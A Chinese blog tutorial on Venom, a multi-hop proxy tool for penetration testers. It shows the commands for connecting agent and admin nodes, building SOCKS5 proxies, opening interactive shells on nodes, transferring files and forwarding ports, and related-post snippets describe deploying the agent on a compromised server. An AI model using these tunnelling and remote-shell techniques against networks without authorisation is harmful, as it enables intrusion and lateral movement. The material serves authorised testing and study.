内网代理神奇Venom

最新推荐文章于 2024-07-24 17:04:22 发布
最新推荐文章于 2024-07-24 17:04:22 发布
阅读量664 收藏 2
点赞数 1
分类专栏: Web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37668015/article/details/121159231
版权

Venom项目地址:https://github.com/Dliv3/Venom/releases

0x00 Venom介绍:

Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具,可将多个节点进行连接,然后以节点为跳板,构建多级代理。

0x01 特性
可视化网络拓扑
多级socks5代理
多级端口转发
端口复用 (apache/mysql/...)
ssh隧道
交互式shell
文件的上传和下载
支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mips)

0x02 Venom的正向代理与反向代理

agent监听端口,admin发起连接:

./agent_linux_x64 -lport 8888
./admin_macos_x64 -rhost 192.168.204.139 -rport 8888

admin监听端口,agent发起连接:

./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999

0x03 admin节点内置命令

show 显示网络拓扑
A表示admin节点,数字表示agent节点 ,如下图所示,代表了进行两层的代理,有两个agent节点:
在这里插入图片描述
goto ID 进入某agent节点
进入节点1,对其利用
在这里插入图片描述
socks 端口 建立到某节点的socks5代理
建立本地与节点1的Socks5代理,代理端口为9999:
在这里插入图片描述
开启代理后会在admin节点本地开启777端口,使用代理工具连接就可以用了

0x04 setdes/getdes 设置/获取节点信息描述

起到标记节点的作用:
在这里插入图片描述

0x05 shell 获取节点的交互式shell

在这里插入图片描述

0x06 upload/download 向节点上传/从节点下载文件

将本地桌面上的test.txt上传到节点1上:
在这里插入图片描述

将节点1上的test2.txt下载到本地的:
在这里插入图片描述

0x08 lforward/rforward 将本地端口转发到远程/将远程端口转发到本地

  • lforward将admin节点本地的8888端口转发到node1的8888端口
(node 1) >>> lforward 127.0.0.1 8888 8888
forward local network 127.0.0.1 port 8888 to remote port 8888
  • rforward 将node1网段的192.168.204.103端口8889转发到admin节点本地的8889端口
(node 1) >>> rforward 192.168.204.103 8889 8889
forward remote network 192.168.204.103 port 8889 to local port 8889

免责声明:本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

“免费代理IP” 又双叒叕来了,这次无限量、更稳定。(附带使用教程)
xlong8899的博客
03-23 2万+
Hello大家好,我是小R,还记得上一次分享的免费代理IP吗? 豪礼相送,免费代理IP(稳定)+完整教程(送完整源码) 自从上一次分享免费代理IP之后,公众号的回复量剧增,大多数IP已经被过多使用而导致不稳定。这段时间有不少小伙伴们找小R要稳定的代理IP,小R太难了图片 但是,最后还是让小R想到了办法,实现了实时更新稳定代理IP,并将它以小程序的形式呈现,免费为大家提供无限量稳定IP。觉得有帮助的小伙伴请多多支持! 今天就为大家分享这款小程序—【小R代理IP】,一起来看看吧! 小程序展示 【步骤一】 关
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7870
代理面试常问一.概述代理的本质是socks协议
剑指Offer.36 二叉搜索树与双向链表
qq_43269370的博客
09-27 351
输入一棵二叉搜索树,将该二叉搜索树转换成一个排序的循环双向链表 要求不能创建任何新的节点,只能调整树中节点指针的指向 解题思路 中序遍历二叉树, 遍历每个节点的时候, 用变量保存好头节点, 当前节点的上一节点, 尾节点 将当前节点的left指向前一节点, 上一节点的right指向当前节点 最后头节点和尾节点需要互指(头.left = 尾, 尾.right = 头) 代码 /* // Definition for a Node. class Node { public int val; pub
内网穿透工具-venom
weixin_43227251的博客
04-12 1206
venom 反向连接和正向连接 admin节点和agent节点均可监听连接也可发起连接 admin监听端口,agent发起连接: ./admin_macos_x64 -lport 9999 ./agent_linux_x64 -rhost 192.168.0.103 -rport 9999 agent监听端口,admin发起连接: ./agent_linux_x64 -lport 8888 ./admin_macos_x64 -rhost 192.168.204.139 -rport 8888 网络拓扑
Venom代理工具使用--以三层代理为例
y920312的专栏
03-30 1848
利用虚拟机模拟多层网络,以多层代理渗透为例,描述代理工具Venom的使用测试过程,帮助渗透测试人员使用Venom工具轻松地将网络流量代理到多层内网,并管理代理节点。
HTTP隐蔽隧道工具--Venom流量特征检测分析
qq_36259703的博客
10-19 686
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。
Venom - 一款为渗透测试人员设计的使用Go开发的多级代理工具.zip
07-18
Venom - 一款为渗透测试人员设计的使用Go开发的多级代理工具.zip
Venom
03-12
毒液用户机器人 #include /** Your Telegram account may get banned. I am not responsible for any improper use of this bot This bot is intended for the purpose of having fun with memes, ...
Venom Guestbook-开源
05-15
Venom Guestbook 开源详解】 Venom Guestbook 是一款开源的在线留言簿软件,专为网站所有者设计,提供了一种与访问者互动、收集反馈的便捷方式。开源软件的特点在于其源代码对公众开放,允许用户自由查看、修改和...
Android代码-Venom
08-06
Venom Your preferred open source focused crawler for the Deep Web. Overview Our aim is to create a blazing fast, fully customizable and robust crawler that is simple and handy to use. Quick links ...
walle v1.1.0使用的vendor包
09-09
walle v1.1.0使用的vendor包 不用花很长时间下载,直接复制粘贴
Venom工具的使用(内网渗透 多级代理
rang的博客
08-19 3599
在Moriarty Corp靶场下使用Venom工具穿透内网 工具说明:https://github.com/Dliv3/Venom 编译好的可执行文件:https://github.com/Dliv3/Venom/releases admin监听端口,agent发起连接: ./admin_linux_x64 -lport 9999 # 攻击机开启监听 ./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接 agent监
Mac下nginx的反向代理配置
PrettyBoyOnlyU的博客
06-07 779
Mac下nginx的反向代理配置 随着人们日益增长的需求,对网络依赖性越来越大。随着而来的就是各大网站服务器也要随着升级改变。分布式也是顺应潮流成了目前主流之一。目前接触过的的有2种: 负载均衡 主要是以nginx实现 Jmeter分布式 是一种master-slave关系的分布式,控制机叫master,其他承受压力的叫slavers 等有空再继续再学习新的分布式,这次简单的说一下,nginx负载均衡实现简单的分布式。首先需要安装nginx,可以参考这里。打开nginx 的配置文件nginx.conf,
MacOS开发必备工具brew,安装nginx反向代理,替代linux工具 apt-get和 yum ...
weixin_33795806的博客
02-21 509
Mac os开发者必备工具 brew,替代Linux系统中的 apt-get和yum工具,本文介绍Mac电脑安装Homebrew,并下载安装软件nginx反向代理过程。1、安装Homebrew在苹果Mac OS操作系统中,替代linux系统工具apt-get和yum的软件就是Homebrew。 macOS要求macOS 10.12(或更高版本)2Xcod...
Venom工具的使用
weixin_44508748的博客
05-23 4654
前提:已经拿到某服务器shell,可以上传文件且具有执行权限; 项目地址(编译后):https://github.com/Dliv3/Venom/releases 一、进入内网 1.上传admin_linux_x64到vps端,运行并监听本地11111端口: chmod 777 admin_linux_x64 ./ admin_linux_x64 -lport 11111 2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行 chmod 777 agent_linu
Venom 内网穿透
weixin_44617541的博客
04-17 4706
Venom 内网穿透
内网隧道——Venom(毒液)
最新发布
qq_55202378的博客
07-24 2167
Venom工具也被称为“毒液工具”,它是一款开源的多级代理工具,使用Go语言开发,支持多种平台。Venom可以将多个节点进行连接,并以节点为跳板构建多级代理搭建网络隧道,渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网管理代理节点,利用"毒液"进行可视化网络拓扑、多级Socks5代理、多级端口转发、端口复用(Apache、Mysql等服务)、SSH隧道、交互式Shell、文件的上传和下载、节点间通信加密等。网络拓扑如下:攻击机kali IP:192.168.111.0。
最详细mac下配置 nginx配置反向代理
热门推荐
resilient的博客
01-16 1万+
代理和反向代理概念   反向代理的作用  ①保护网站安全:任何来自Internet的请求都必须先经过代理服务器; ②通过配置缓存功能加速Web请求:可以缓存真实Web服务器上的某些静态资源,减轻真实Web服务器的负载压力; ③实现负载均衡:充当负载均衡服务器均衡地分发请求,平衡集群中各个服务器的负载压力;   之前在mac环境下 使用brew install nginx安装了ngi...
Mac下使用nginx反向代理服务器解决资源跨域问题
苏澜一的博客
08-24 3416
Mac下使用nginx反向代理服务器解决资源跨域问题
解压:venom源码解析与应用
由于提供的信息中标题、描述和标签几乎相同且未提供额外的描述性内容,我们可以推断这些文件包含与“venom”相关的源代码。以下是对该主题的知识点详细说明。 ### 知识点: 1. **Venom 的含义** - Venom 在不同的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值